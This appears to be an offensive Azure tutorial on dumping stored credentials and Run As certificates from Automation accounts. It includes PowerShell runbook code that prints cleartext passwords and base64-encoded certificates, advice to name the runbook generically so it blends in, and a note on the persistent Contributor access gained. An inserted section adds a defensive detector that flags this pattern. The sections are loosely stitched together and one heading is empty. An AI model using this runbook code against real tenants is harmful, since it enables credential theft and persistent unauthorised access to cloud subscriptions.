Automation Accounts Credentials Extraction
Steps
1) First, we will need to create a new runbook in the account. Ideally, we would name this something generic, such as AzureAutomationTutorials, to blend in.
2) This runbook will cast the Cred-1 credential item to a variable, then output the username and password to the job output:
$myCredential = Get-AutomationPSCredential -Name 'Cred-1'
$userName = $myCredential.UserName
$password = $myCredential.GetNetworkCredential().Password
$userName
$password
3) We will follow a similar process for exporting the attached Automation account Run as certificates:
$RunAsCert = Get-AutomationCertificate -Name 'AzureRunAsCertificate'
$CertificatePath = Join-Path $env:temp RunAsCertificate.pfx
$Cert = $RunAsCert.Export('pfx','CertificatePassword')
Set-Content -Value $Cert -Path $CertificatePath -Force -Encoding Byte | Write-Verbose
$base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes($CertificatePath))
$base64string
4) Finally, we can review the job output to recover the credentials. The certificates can be converted back to pfx files from the Base64 strings, and the stored credentials should be available in cleartext.
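When reviewing the runbooks in an Automation account, the pattern from steps 2 and 3 can be checked for statically. The following is an added example, not part of the original page: it parses runbook source with the PowerShell AST and flags a credential asset turned into a plaintext password, or a certificate asset exported. Find-SecretExportPattern is a hypothetical helper name, both sample runbooks are constructed, and the check is a heuristic that legitimate runbooks can also trigger.

```powershell
# Added example: static review of runbook source text (heuristic, not exhaustive).
# Find-SecretExportPattern is a hypothetical helper; the sample runbooks are constructed.
function Find-SecretExportPattern {
    param(
        [Parameter(Mandatory)] [string] $Name,
        [Parameter(Mandatory)] [string] $Source
    )
    $tokens = $null; $errors = $null
    $ast = [System.Management.Automation.Language.Parser]::ParseInput($Source, [ref]$tokens, [ref]$errors)

    # Names of every command invoked anywhere in the runbook
    $commands = $ast.FindAll({ param($n) $n -is [System.Management.Automation.Language.CommandAst] }, $true) |
        ForEach-Object { $_.GetCommandName() }
    # Names of every method call, e.g. .GetNetworkCredential() or .Export(...)
    $methods = $ast.FindAll({ param($n) $n -is [System.Management.Automation.Language.InvokeMemberExpressionAst] }, $true) |
        ForEach-Object { $_.Member.Extent.Text.Trim("'", '"') }

    $findings = @()
    if ($commands -contains 'Get-AutomationPSCredential' -and $methods -contains 'GetNetworkCredential') {
        $findings += 'credential asset converted to a plaintext password'
    }
    if ($commands -contains 'Get-AutomationCertificate' -and $methods -contains 'Export') {
        $findings += 'certificate asset exported from the runbook'
    }
    [pscustomobject]@{
        Runbook     = $Name
        Suspicious  = ($findings.Count -gt 0)
        Findings    = $findings -join '; '
        ParseErrors = $errors.Count
    }
}

# Constructed sample 1: the pattern from steps 2 and 3
$exportRunbook = @'
$myCredential = Get-AutomationPSCredential -Name 'Cred-1'
$password = $myCredential.GetNetworkCredential().Password
$password
$RunAsCert = Get-AutomationCertificate -Name 'AzureRunAsCertificate'
$Cert = $RunAsCert.Export('pfx','CertificatePassword')
'@
# Constructed sample 2: a routine runbook that passes the credential object on unchanged
$routineRunbook = @'
$cred = Get-AutomationPSCredential -Name 'Cred-1'
Connect-AzAccount -Credential $cred | Out-Null
'@
Find-SecretExportPattern -Name 'constructed-export'  -Source $exportRunbook
Find-SecretExportPattern -Name 'constructed-routine' -Source $routineRunbook
```

Only the first sample is reported as suspicious, since the second never unwraps the credential object.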
Create a "Run as" account in the test Automation account
Steps:
1) Log in as the "azureadmin" account, or as an owner of the subscription
2) Navigate to the Automation Accounts section
3) Either choose an existing Automation account or create a new one. If you're creating a new Automation account, a Run as account can be created along with the account.
4) Select Run as accounts from the menu blade
5) Choose Create Azure Run As Account in the menu
6) In the next window, select the Create button
That is all that we need to do! Now we have a Run as service principal account to extract from our sample Automation account. By default, this account will have the Contributor role applied for the subscription that it is created in.
Extracting Stored Passwords and Certificates from Automation Accounts
Steps
We now have the cleartext credentials from the Automation account and a private certificate that we can use to authenticate as the Run as account. Since the Contributor role is configured for the Run as account by default, we will likely have a persistent Contributor account in the subscription.
Alternate method for Automation Accounts credentials dumping: